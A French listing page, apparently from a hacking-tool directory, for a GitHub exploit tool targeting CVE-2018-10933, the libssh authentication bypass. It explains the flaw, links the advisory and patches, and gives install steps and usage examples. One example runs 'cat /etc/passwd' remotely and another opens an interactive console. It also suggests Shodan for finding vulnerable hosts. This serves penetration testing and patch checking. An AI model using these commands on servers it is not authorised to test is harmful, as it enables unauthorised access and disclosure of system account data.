Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-10933 — libSSH-Authentication-Bypass | Kitploit
Outils/GitHubGitHub/rubikcuv5/cve-2018-10933
Authentification et AutorisationAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité RéseauTests d'Intrusion
GitHubrubikcuv5/cve-2018-10933

CVE-2018-10933

libSSH-Authentication-Bypass

Voir le dépôt
12il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-10933


Une vulnérabilité a été découverte dans la machine d'état côté serveur de libssh avant les versions 0.7.6 et 0.8.4. Un client malveillant pourrait créer des canaux sans avoir préalablement effectué l'authentification, entraînant un accès non autorisé.

QUELQUES DÉTAILS

Le problème vient de la manière dont libssh ne maintient pas l'état pour l'authentification et de la façon dont cela peut être utilisé pour contourner l'authentification. En gros, considérez la connexion comme un processus en plusieurs étapes : étape1, étape2, étape3... Comme libssh n'impose pas l'ordre des étapes, vous pouvez essentiellement sauter à l'étape3 sans passer par les étapes1 et 2.

Fait intéressant, le même problème a été découvert plus tôt dans la bibliothèque SSH Paramiko : CVE-2018-7750.

Documentation

Exploit-DB : https://www.exploit-db.com/exploits/45638

Informations sur CVE-2018-10933 par libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Publication de correctifs par libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

Installation

root@kitploit:~
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

Utilisation

root@kitploit:~
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   

EXEMPLES POC

EXEMPLE (vérifier si l'hôte est vulnérable)

root@kitploit:~
python3 main.py  0.0.0.0 -port 22  -t

EXEMPLE (envoyer une commande via un argument)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"

EXEMPLE (utiliser une console interactive simple)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -l

Shodan.io libSSH

root@kitploit:~
[!] can find  devices vulnerables using shodan.io 
-  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )

Auteurs

  • Rubickcuv
Télécharger l’outil